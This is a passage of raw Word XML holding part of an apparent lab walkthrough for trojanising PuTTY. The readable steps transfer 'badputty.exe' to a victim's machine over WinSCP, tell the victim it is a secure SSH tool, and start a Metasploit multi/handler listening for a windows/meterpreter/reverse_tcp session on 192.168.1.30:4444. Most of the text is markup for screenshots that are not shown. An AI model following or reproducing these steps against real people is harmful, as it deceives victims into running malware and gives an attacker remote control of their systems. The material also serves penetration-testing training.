          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Step 2: Transfer File to Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE5926" w14:textId="51B23141" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00806273" w:rsidP="00E22305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Open WinSCP on Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDEE1D8" w14:textId="23FCCFFF" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00806273" w:rsidP="00E22305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Connect to the victim’s shared folder or use known credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508AE98B" w14:textId="29D8FD7E" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00806273" w:rsidP="00E22305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Transfer badputty.exe to Desktop or Downloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379553CF" w14:textId="2F8A303C" w:rsidR="00806273" w:rsidRDefault="00806273" w:rsidP="00E22305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Social Engineering: Tell the victim it’s a secure SSH tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B806E7E" w14:textId="380831EE" w:rsidR="00D71939" w:rsidRDefault="00363274" w:rsidP="00D7193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087749CE" wp14:editId="59185199">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3916680</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2453640" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20250"/>
                <wp:lineTo x="21466" y="20250"/>
                <wp:lineTo x="21466" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="9669791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79167" name="Picture 966979167"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22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5329">
        <w:rPr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096CE721" wp14:editId="7FCB7DA8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>228600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2842260" cy="655320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20721"/>
                <wp:lineTo x="21426" y="20721"/>
                <wp:lineTo x="21426" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="4813621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62180" name="Picture 481362180"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23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E8E">
        <w:rPr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37BE94FF" wp14:editId="1205C82E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4853940</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>887095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2484120" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21044"/>
                <wp:lineTo x="21368" y="21044"/>
                <wp:lineTo x="21368" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="19281538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53887" name="Picture 192815388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A5A51A" w14:textId="012BA794" w:rsidR="00D71939" w:rsidRDefault="00D71939" w:rsidP="00D71939">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B1368B" w14:textId="71F2EA20" w:rsidR="0050193D" w:rsidRDefault="000D5329" w:rsidP="00D7193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6172047E" wp14:editId="42A5ED30">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>228600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>83820</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2903220" cy="784860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20971"/>
                <wp:lineTo x="21402" y="20971"/>
                <wp:lineTo x="21402" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="11082852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85229" name="Picture 110828522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DC093C" w14:textId="089FB517" w:rsidR="0050193D" w:rsidRPr="00D71939" w:rsidRDefault="0050193D" w:rsidP="00D71939">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFB766E" w14:textId="3E419B9D" w:rsidR="00083780" w:rsidRDefault="00083780" w:rsidP="00806273">
      <w:pPr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94080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44E34638" wp14:editId="5A05632C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-167640</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4861981" cy="1318374"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21225"/>
                <wp:lineTo x="21498" y="21225"/>
                <wp:lineTo x="21498" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="9978487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48713" name="Picture 9978487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20E1A0" w14:textId="63AE49B0" w:rsidR="00083780" w:rsidRDefault="00083780" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7E1B1C" w14:textId="50F55CF2" w:rsidR="00083780" w:rsidRDefault="00083780" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EC7ABA" w14:textId="7E6B3FDC" w:rsidR="00083780" w:rsidRDefault="00083780" w:rsidP="00806273">
      <w:pPr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08C3692E" wp14:editId="1BBA7F4E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-190500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>323215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4838700" cy="487680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21094"/>
                <wp:lineTo x="21515" y="21094"/>
                <wp:lineTo x="21515" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="110110908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109081" name="Picture 110110908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AA50415" w14:textId="3651BEAB" w:rsidR="00083780" w:rsidRDefault="00083780" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16AA85A0" w14:textId="0FD2584F" w:rsidR="00083780" w:rsidRDefault="00083780" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569F4FF1" w14:textId="2E83B4C6" w:rsidR="00083780" w:rsidRDefault="000026B4" w:rsidP="0080627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00224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0DBAE4FA" wp14:editId="0EF8F300">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-213360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4808220" cy="548640"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21000"/>
                <wp:lineTo x="21480" y="21000"/>
                <wp:lineTo x="21480" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="11225178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17880" name="Picture 112251788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151626E" w14:textId="1DAA5AC3" w:rsidR="00332C92" w:rsidRDefault="00332C92" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197836C1" w14:textId="34AFA77B" w:rsidR="00332C92" w:rsidRDefault="000026B4" w:rsidP="0080627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01248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="641B1A6C" wp14:editId="2939FC96">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-190500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>323215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4678680" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21060"/>
                <wp:lineTo x="21547" y="21060"/>
                <wp:lineTo x="21547" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="2407168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16844" name="Picture 24071684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1980A75" w14:textId="6754A0F4" w:rsidR="00332C92" w:rsidRDefault="00332C92" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C57C251" w14:textId="4EB0D993" w:rsidR="00332C92" w:rsidRDefault="00332C92" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE18631" w14:textId="4454D553" w:rsidR="000026B4" w:rsidRDefault="000026B4" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0282ADA1" w14:textId="0588A5E6" w:rsidR="000026B4" w:rsidRDefault="000026B4" w:rsidP="0080627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2175E74D" wp14:editId="63385163">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3589020" cy="845820"/>
            <wp:effectExtent l="152400" t="114300" r="144780" b="163830"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-688" y="-2919"/>
                <wp:lineTo x="-917" y="5838"/>
                <wp:lineTo x="-917" y="21405"/>
                <wp:lineTo x="-459" y="25297"/>
                <wp:lineTo x="21898" y="25297"/>
                <wp:lineTo x="22357" y="21405"/>
                <wp:lineTo x="22357" y="5838"/>
                <wp:lineTo x="22127" y="-1459"/>
                <wp:lineTo x="22127" y="-2919"/>
                <wp:lineTo x="-688" y="-2919"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="14410209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20971" name="Picture 144102097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8458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682F34" w14:textId="77777777" w:rsidR="000026B4" w:rsidRDefault="000026B4" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C532602" w14:textId="77777777" w:rsidR="000026B4" w:rsidRPr="00A90CD6" w:rsidRDefault="000026B4" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D77F6B8" w14:textId="26D50EA3" w:rsidR="00806273" w:rsidRPr="00A90CD6" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A90CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Step 3: Start Metasploit Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E40C1EB" w14:textId="2C125E00" w:rsidR="00806273" w:rsidRPr="00557EB4" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00557EB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555C1C60" w14:textId="58743DC7" w:rsidR="00806273" w:rsidRPr="00557EB4" w:rsidRDefault="00806273" w:rsidP="00557EB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00557EB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49B97E11" w14:textId="4898F3E9" w:rsidR="00806273" w:rsidRPr="00B636BA" w:rsidRDefault="00806273" w:rsidP="00557EB4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B636BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D98E4F" w14:textId="59615445" w:rsidR="00806273" w:rsidRPr="00B636BA" w:rsidRDefault="00806273" w:rsidP="00557EB4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B636BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B636BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B636BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B636BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DCC41D4" w14:textId="76919387" w:rsidR="00806273" w:rsidRPr="00B636BA" w:rsidRDefault="00806273" w:rsidP="00557EB4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B636BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set LHOST 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="003E15C7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50066391" w14:textId="77777777" w:rsidR="00806273" w:rsidRPr="00B636BA" w:rsidRDefault="00806273" w:rsidP="00557EB4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B636BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F65891D" w14:textId="305D73FF" w:rsidR="00806273" w:rsidRDefault="00806273" w:rsidP="00557EB4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B636BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D701DF" w14:textId="3562AC56" w:rsidR="00D71939" w:rsidRDefault="00192402" w:rsidP="00D71939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10464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D8812A9" wp14:editId="36A89DB6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>302895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2362200" cy="2621280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21506"/>
                <wp:lineTo x="21426" y="21506"/>
                <wp:lineTo x="21426" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="87299067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90673" name="Picture 87299067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7BD0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B0AAF08" wp14:editId="7F382E30">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>348615</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3322320" cy="2613660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21411"/>
                <wp:lineTo x="21427" y="21411"/>
                <wp:lineTo x="21427" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="13263158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15857" name="Picture 132631585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AECBB91" w14:textId="77777777" w:rsidR="00D71939" w:rsidRDefault="00D71939" w:rsidP="00D71939">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C9ECCA" w14:textId="09D294B3" w:rsidR="00C77BD0" w:rsidRDefault="003E15C7" w:rsidP="0080627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03296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="125325BC" wp14:editId="6EB1FEB6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>358140</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>307340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3558848" cy="518205"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20647"/>
                <wp:lineTo x="21507" y="20647"/>
                <wp:lineTo x="21507" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="12439337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33724" name="Picture 124393372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D5DCC8" w14:textId="099EDA96" w:rsidR="00C77BD0" w:rsidRDefault="00C77BD0" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31525E42" w14:textId="3A4FA1D1" w:rsidR="00C77BD0" w:rsidRDefault="003E15C7" w:rsidP="0080627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04320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A3370C1" wp14:editId="0E7134F3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>327660</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>250825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3634740" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20618"/>
                <wp:lineTo x="21509" y="20618"/>
                <wp:lineTo x="21509" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="2447715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71536" name="Picture 24477153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BD3EE83" w14:textId="0ED1AE7C" w:rsidR="00C77BD0" w:rsidRDefault="00C77BD0" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D55B789" w14:textId="244C4F4C" w:rsidR="00C77BD0" w:rsidRDefault="00AE30CC" w:rsidP="0080627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05344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A344880" wp14:editId="2D8F2B5F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>274320</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>238125</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3672840" cy="449580"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21051"/>
                <wp:lineTo x="21510" y="21051"/>
                <wp:lineTo x="21510" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="17209741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74168" name="Picture 172097416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E0A83CB" w14:textId="77777777" w:rsidR="00C77BD0" w:rsidRDefault="00C77BD0" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A312DC4" w14:textId="0DBBC7BF" w:rsidR="00C77BD0" w:rsidRDefault="00A7136B" w:rsidP="0080627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06368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07C80304" wp14:editId="5EB549FE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>213360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>103505</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3726180" cy="350520"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19957"/>
                <wp:lineTo x="21534" y="19957"/>
                <wp:lineTo x="21534" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="112516910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69109" name="Picture 112516910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98668AC" w14:textId="29E398CA" w:rsidR="00C77BD0" w:rsidRDefault="00C22F23" w:rsidP="0080627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07392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42DC791B" wp14:editId="7E7D11D2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>777240</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>302260</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2537460" cy="838200"/>
            <wp:effectExtent l="152400" t="171450" r="167640" b="171450"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-1297" y="-4418"/>
                <wp:lineTo x="-1297" y="25527"/>
                <wp:lineTo x="22865" y="25527"/>
                <wp:lineTo x="22703" y="-4418"/>
                <wp:lineTo x="-1297" y="-4418"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="13603666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66679" name="Picture 1360366679"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37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838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B3AAE80" w14:textId="50C422BC" w:rsidR="00C77BD0" w:rsidRDefault="00C77BD0" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E0C18E" w14:textId="11C1D9C9" w:rsidR="00C77BD0" w:rsidRDefault="00C77BD0" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C8B685" w14:textId="5809F269" w:rsidR="00C77BD0" w:rsidRDefault="00144959" w:rsidP="0080627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08416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="58E6D84E" wp14:editId="4A04D3F1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>838200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>238125</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1972945" cy="358140"/>
            <wp:effectExtent l="0" t="0" r="8255" b="3810"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20681"/>
                <wp:lineTo x="21482" y="20681"/>
                <wp:lineTo x="21482" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
